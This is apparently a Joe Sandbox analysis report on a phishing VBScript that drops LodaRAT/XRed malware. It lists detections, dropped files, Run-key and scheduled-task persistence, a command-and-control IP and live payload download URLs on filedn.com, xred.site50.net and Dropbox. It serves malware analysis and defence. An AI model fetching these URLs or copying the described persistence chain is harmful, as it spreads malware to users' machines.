                            Security Software Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job221
                            Registry Run Keys / Startup Folder                            		131
                            Virtualization/Sandbox Evasion                            		Proc Filesystem131
                            Virtualization/Sandbox Evasion                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                            Access Token Manipulation                            		/etc/passwd and /etc/shadow3
                            Process Discovery                            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron112
                            Process Injection                            		Network Sniffing11
                            Application Window Discovery                            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                            System Owner/User Discovery                            		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582356 Sample: Open Purchase Order Summary... Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 74 freedns.afraid.org 2->74 76 xred.mooo.com 2->76 78 6 other IPs or domains 2->78 104 Suricata IDS alerts for network traffic 2->104 106 Found malware configuration 2->106 108 Antivirus detection for URL or domain 2->108 112 21 other signatures 2->112 10 wscript.exe 15 2->10         started        15 TXAASJ.exe 2->15         started        17 Google.exe 2->17         started        19 9 other processes 2->19 signatures3 110 Uses dynamic DNS services 74->110 process4 dnsIp5 84 filedn.com 23.109.93.100, 443, 49730 SERVERS-COMUS Netherlands 10->84 60 C:\Users\user\AppData\Roaming\...behaviorgraphoogle.exe, PE32 10->60 dropped 62 C:\Users\user\AppData\...\Products-Pdf[1].exe, PE32 10->62 dropped 120 System process connects to network (likely due to code injection or exploit) 10->120 122 Benign windows process drops PE files 10->122 124 VBScript performs obfuscated calls to suspicious functions 10->124 134 2 other signatures 10->134 21 Google.exe 1 5 10->21         started        126 Antivirus detection for dropped file 15->126 128 Multi AV Scanner detection for dropped file 15->128 130 Machine Learning detection for dropped file 15->130 132 Found API chain indicative of sandbox detection 15->132 64 C:\Users\user\AppData\...\._cache_Google.exe, PE32 17->64 dropped 66 C:\ProgramData\Synaptics\RCX915F.tmp, PE32 17->66 dropped 25 Synaptics.exe 17->25         started        28 ._cache_Google.exe 17->28         started        file6 signatures7 process8 dnsIp9 52 C:\Users\user\AppData\...\._cache_Google.exe, PE32 21->52 dropped 54 C:\ProgramData\Synaptics\Synaptics.exe, PE32 21->54 dropped 56 C:\ProgramData\Synaptics\RCXC360.tmp, PE32 21->56 dropped 114 Creates multiple autostart registry keys 21->114 30 ._cache_Google.exe 2 5 21->30         started        35 Synaptics.exe 38 21->35         started        80 142.250.181.238, 443, 51918, 51919 GOOGLEUS United States 25->80 82 142.250.185.193, 443, 51929, 51931 GOOGLEUS United States 25->82 58 C:\Users\user\Documents\~$cache1, PE32 25->58 dropped 37 WerFault.exe 25->37         started        file10 signatures11 process12 dnsIp13 86 172.111.138.100, 49753, 5552 VOXILITYGB United States 30->86 68 C:\Users\user\AppData\Roaming\...\TXAASJ.exe, PE32 30->68 dropped 70 C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, ASCII 30->70 dropped 94 Antivirus detection for dropped file 30->94 96 Multi AV Scanner detection for dropped file 30->96 98 Machine Learning detection for dropped file 30->98 100 Creates multiple autostart registry keys 30->100 39 cmd.exe 30->39         started        42 wscript.exe 30->42         started        88 docs.google.com 142.250.185.206, 443, 49736, 49737 GOOGLEUS United States 35->88 90 drive.usercontent.google.com 142.250.186.33, 443, 49743, 49744 GOOGLEUS United States 35->90 92 freedns.afraid.org 69.42.215.252, 49740, 49776, 51926 AWKNET-LLCUS United States 35->92 72 C:\Users\user\Documents\DTBZGIOOSO\~$cache1, PE32 35->72 dropped 102 Drops PE files to the document folder of the user 35->102 44 WerFault.exe 35->44         started        46 WerFault.exe 35->46         started        file14 signatures15 process16 signatures17 116 Uses schtasks.exe or at.exe to add and modify task schedules 39->116 48 conhost.exe 39->48         started        50 schtasks.exe 39->50         started        118 Windows Scripting host queries suspicious COM object (likely to drop second stage) 42->118 process18

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            Open Purchase Order Summary Details-16-12-2024.vbs44%VirustotalBrowse
                            Open Purchase Order Summary Details-16-12-2024.vbs29%ReversingLabsWin32.Trojan.Valyria

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\Documents\~$cache1100%AviraTR/Dldr.Agent.SH
                            C:\Users\user\Documents\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                            C:\ProgramData\Synaptics\RCX915F.tmp100%AviraTR/Dldr.Agent.SH
                            C:\ProgramData\Synaptics\RCX915F.tmp100%AviraW2000M/Dldr.Agent.17651006
                            C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                            C:\ProgramData\Synaptics\Synaptics.exe100%AviraHEUR/AGEN.1353217
                            C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe100%AviraHEUR/AGEN.1353217
                            C:\Users\user\Documents\DTBZGIOOSO\~$cache1100%AviraTR/Dldr.Agent.SH
                            C:\Users\user\Documents\DTBZGIOOSO\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe100%AviraTR/Dldr.Agent.SH
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe100%AviraHEUR/AGEN.1353217
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe100%AviraW2000M/Dldr.Agent.17651006
                            C:\Users\user\AppData\Local\Temp\BBLXFG.vbs100%AviraVBS/Runner.VPJI
                            C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe100%AviraHEUR/AGEN.1353217
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exe100%AviraTR/Dldr.Agent.SH
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exe100%AviraHEUR/AGEN.1353217
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exe100%AviraW2000M/Dldr.Agent.17651006
                            C:\Users\user\AppData\Local\Temp\._cache_Google.exe100%AviraHEUR/AGEN.1353217
                            C:\ProgramData\Synaptics\RCXC360.tmp100%AviraTR/Dldr.Agent.SH
                            C:\ProgramData\Synaptics\RCXC360.tmp100%AviraW2000M/Dldr.Agent.17651006
                            C:\Users\user\Documents\~$cache1100%Joe Sandbox ML
                            C:\ProgramData\Synaptics\RCX915F.tmp100%Joe Sandbox ML
                            C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe100%Joe Sandbox ML
                            C:\Users\user\Documents\DTBZGIOOSO\~$cache1100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\._cache_Google.exe100%Joe Sandbox ML
                            C:\ProgramData\Synaptics\RCXC360.tmp100%Joe Sandbox ML
                            C:\ProgramData\Synaptics\RCX915F.tmp92%ReversingLabsWin32.Worm.Zorex
                            C:\ProgramData\Synaptics\RCXC360.tmp92%ReversingLabsWin32.Worm.Zorex
                            C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exe92%ReversingLabsWin32.Trojan.Synaptics
                            C:\Users\user\AppData\Local\Temp\._cache_Google.exe87%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe87%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe92%ReversingLabsWin32.Trojan.Synaptics
                            C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe87%ReversingLabsWin32.Trojan.Generic
                            C:\Users\user\Documents\DTBZGIOOSO\~$cache192%ReversingLabsWin32.Worm.Zorex
                            C:\Users\user\Documents\~$cache192%ReversingLabsWin32.Worm.Zorex

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            https://drive.iU0%Avira URL Cloudsafe
                            http://xred.site50.net/syn/SSLLibrary.dld100%Avira URL Cloudmalware

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            freedns.afraid.org
                            		69.42.215.252
                            		truefalse
                              		high
                              docs.google.com
                              		142.250.185.206
                              		truefalse
                                		high
                                s-part-0017.t-0009.t-msedge.net
                                		13.107.246.45
                                		truefalse
                                  		high
                                  drive.usercontent.google.com
                                  		142.250.186.33
                                  		truefalse
                                    		high
                                    filedn.com
                                    		23.109.93.100
                                    		truefalse
                                      		high
                                      xred.mooo.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        206.23.85.13.in-addr.arpa
                                        		unknown
                                        		unknownfalse
                                          		high

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          xred.mooo.comfalse
                                            		high
                                            https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Products-Pdf.exefalse
                                              		high
                                              http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=Google.exe, 0000001A.00000003.2270153764.00000000023A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://docs.google.com/emeSynaptics.exe, 0000001D.00000002.3055866183.000000001D83E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://xred.site50.net/syn/SSLLibrary.dldGoogle.exe, 0000001A.00000003.2270153764.00000000023A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1Google.exe, 00000001.00000000.1725463339.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://docs.google.com/8Synaptics.exe, 00000005.00000002.2039578728.00000000006E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://drive.usercontent.google.com//Synaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=TGoogle.exe, 00000001.00000003.1743429618.0000000002290000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://docs.google.com/uSynaptics.exe, 00000005.00000002.2051658236.0000000007056000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://docs.google.com/8ySynaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://docs.google.com/1Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Products-Pdf.exeYwscript.exe, 00000000.00000003.1727027971.00000231A048F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1728937926.00000231A048F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978D9L4mjSynaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Products-Pdf.exeuwscript.exe, 00000000.00000003.1725904864.000002319DD13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1727945745.000002319DD38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1725962280.000002319DD33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://drive.usercontent.google.com/Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://xred.site50.net/syn/Synaptics.rarGoogle.exe, 0000001A.00000003.2270153764.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Products-Pdf.exetwscript.exe, 00000000.00000003.1726636255.000002319FC25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://ip-score.com/checkip/._cache_Google.exe, 00000002.00000002.2949109717.00000000013D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://docs.google.com/userSynaptics.exe, 00000005.00000002.2051658236.0000000007056000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://docs.google.com/dSynaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://docs.google.com/Synaptics.exe, 00000005.00000002.2051658236.0000000007056000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2039578728.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.0000000000918000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://docs.google.com/aSynaptics.exe, 00000005.00000002.2051658236.0000000007056000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://docs.google.com/google.com/Synaptics.exe, 00000005.00000002.2051658236.0000000007056000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://xred.site50.net/syn/SSLLibrary.dlGoogle.exe, 00000001.00000003.1743429618.0000000002290000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1Google.exe, 00000001.00000000.1725463339.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1Google.exe, 0000001A.00000003.2270153764.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://xred.site50.net/syn/SUpdate.iniGoogle.exe, 0000001A.00000003.2270153764.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://docs.google.com/uc?id=0;Synaptics.exe, 00000005.00000002.2042900507.0000000004D9E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3039904532.00000000193FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3028942796.000000001417E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3000815859.000000000B0AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3024496824.0000000011AFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3018110430.000000000ECEE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3002897945.000000000BFAE000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://filedn.com/)wscript.exe, 00000000.00000002.1728737665.00000231A042A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1727135319.00000231A0429000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Products-Pdf.exedllwscript.exe, 00000000.00000003.1725904864.000002319DD13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1727945745.000002319DD38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1725962280.000002319DD33000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://xred.site50.net/syn/SSLLibrary.dllGoogle.exe, 00000001.00000000.1725463339.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlxGoogle.exe, 0000001A.00000003.2270153764.00000000023A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://drive.usercontent.google.com/vSynaptics.exe, 0000001D.00000002.2975599142.0000000004D80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlGoogle.exe, 00000001.00000003.1743429618.0000000002290000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://drive.iUSynaptics.exe, 0000001D.00000002.3009536844.000000000E3D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://filedn.com/kwscript.exe, 00000000.00000002.1728737665.00000231A042A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1727135319.00000231A0429000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high

                                                                                                                              World Map of Contacted IPs

                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs

                                                                                                                              Public IPs

                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              142.250.185.206
                                                                                                                              		docs.google.comUnited States
                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                              172.111.138.100
                                                                                                                              		unknownUnited States
                                                                                                                              		3223VOXILITYGBtrue
                                                                                                                              69.42.215.252
                                                                                                                              		freedns.afraid.orgUnited States
                                                                                                                              		17048AWKNET-LLCUSfalse
                                                                                                                              142.250.181.238
                                                                                                                              		unknownUnited States
                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                              142.250.185.193
                                                                                                                              		unknownUnited States
                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                              142.250.186.33
                                                                                                                              		drive.usercontent.google.comUnited States
                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                              23.109.93.100
                                                                                                                              		filedn.comNetherlands
                                                                                                                              		7979SERVERS-COMUSfalse

                                                                                                                              General Information

                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                              Analysis ID:1582356
                                                                                                                              Start date and time:2024-12-30 11:49:54 +01:00
                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                              Overall analysis duration:0h 11m 38s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                              Number of analysed new started processes analysed:36
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:1
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Sample name:Open Purchase Order Summary Details-16-12-2024.vbs
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal100.troj.adwa.expl.evad.winVBS@30/101@19/7
                                                                                                                              EGA Information:
                                                                                                                              • Successful, ratio: 75%
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 100%
                                                                                                                              • Number of executed functions: 95
                                                                                                                              • Number of non-executed functions: 266
                                                                                                                              Cookbook Comments:
                                                                                                                              • Found application associated with file extension: .vbs

                                                                                                                              Warnings

                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 52.109.76.240, 184.28.90.27, 52.113.194.132, 20.42.65.84, 52.168.117.173, 20.42.65.89, 20.190.159.73, 20.12.23.50, 13.85.23.206, 4.245.163.56, 13.107.246.45
                                                                                                                              • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedscolprdeus02.eastus.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, onedscolprdeus11.eastus.cloudapp.azure.com, ecs.office.trafficmanager.net, europe.c
                                                                                                                              • Execution Graph export aborted for target Synaptics.exe, PID 5016 because there are no executed function
                                                                                                                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                              • Report size getting too big, too many NtReadFile calls found.
                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                              Simulations

                                                                                                                              Behavior and APIs

                                                                                                                              TimeTypeDescription
                                                                                                                              05:50:59API Interceptor579x Sleep call for process: Synaptics.exe modified
                                                                                                                              05:51:22API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                              10:50:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              10:50:56Task SchedulerRun new task: BBLXFG.exe path: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe
                                                                                                                              10:51:03AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run BBLXFG "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                                                                                                                              10:51:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              10:51:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run BBLXFG "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe"
                                                                                                                              10:51:27AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BBLXFG.lnk
                                                                                                                              10:51:35AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                              10:51:49AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe

                                                                                                                              Joe Sandbox View / Context

                                                                                                                              IPs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              172.111.138.100Open Purchase Order Summary Sheet.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                  Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                    VKKDXE.exeGet hashmaliciousLodaRAT, XRedBrowse
